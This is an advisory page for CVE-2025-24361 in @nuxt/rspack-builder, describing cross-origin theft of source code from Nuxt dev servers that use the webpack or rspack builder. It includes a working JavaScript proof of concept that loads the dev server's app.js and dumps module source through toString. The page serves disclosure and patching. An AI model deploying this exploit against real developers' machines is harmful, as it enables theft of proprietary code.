logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-24361 @nuxt/rspack-builder

Package

Manager: npm
Name: @nuxt/rspack-builder
Vulnerable Version: >=3.12.2 <3.15.3

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.0007 pctl0.21986

Details

Opening a malicious website while running a Nuxt dev server could allow read-only access to code ### Summary Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site. ### Details Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `<script src="http://localhost:3000/_nuxt/app.js">` in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. ### PoC 1. Create a nuxt project with webpack / rspack builder. 1. Run `npm run dev` 1. Open `http://localhost:3000` 1. Run the script below in a web site that has a different origin. 1. You can see the source code output in the document and the devtools console. ```js const script = document.createElement('script') script.src = 'http://localhost:3000/_nuxt/app.js' script.addEventListener('load', () => { for (const page in window.webpackChunknuxt_app) { const moduleList = window.webpackChunknuxt_app[page][1] console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) ``` ![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85) It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field). ### Impact Users using webpack / rspack builder may get the source code stolen by malicious websites.

Metadata

Created: 2025-01-27T11:31:41Z
Modified: 2025-01-30T03:05:05Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-4gf7-ff8x-hq99/GHSA-4gf7-ff8x-hq99.json
CWE IDs: ["CWE-749"]
Alternative ID: GHSA-4gf7-ff8x-hq99
Finding: F164
Auto approve: 1